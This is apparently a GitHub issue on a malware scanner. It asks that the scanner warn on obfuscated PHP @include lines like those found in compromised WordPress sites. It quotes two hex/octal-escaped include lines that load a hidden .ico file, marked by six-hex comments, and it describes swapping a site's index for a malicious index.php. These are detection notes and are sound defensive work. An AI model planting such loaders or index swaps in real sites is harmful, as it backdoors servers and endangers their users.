@include should generate a warning
lcssanches opened this issue · 0 comments
lcssanches commented
Most of this malwares use @include and an escaped path. (I don't know how to use @(together) without mentioning)
/*8a68d*/
@include "\x2fh\x6fm\x65/\x77e\x62p\x6ce\x78x\x33/\x70u\x62l\x69c\x5fh\x74m\x6c/\x68i\x73-\x68e\x6d.\x6fr\x67/\x5f_\x4dA\x43O\x53X\x2fm\x6fd\x75l\x65s\x2fn\x6fd\x65/\x66a\x76i\x63o\x6e_\x31a\x33f\x384\x2ei\x63o";
/*8a68d*/OR
@include "\057hom\145/we\164wne\164/pu\142lic\137htm\154/wp\055con\164ent\057upl\157ads\057201\066/.e\1420f5\06081.\151co";It would be usefull to search and generate warning to things like this.
Also sometimes what they do is:
+--- Folder
| --- index.html ( or index.php )
What they do is to rename legitmi index to index.html.bak.bak and create an evil version index.php
+--- Folder
| --- index.html.bak.bak
| --- index.php
//index.php
<?php
/*sixhex*/
// evil here ( ò.ó )
/*sixhex*/
@include('index.html.bak.bak')
Also, another thing is this comment with hexadecimal code. They are all six chairs and always have two occurrences in the code.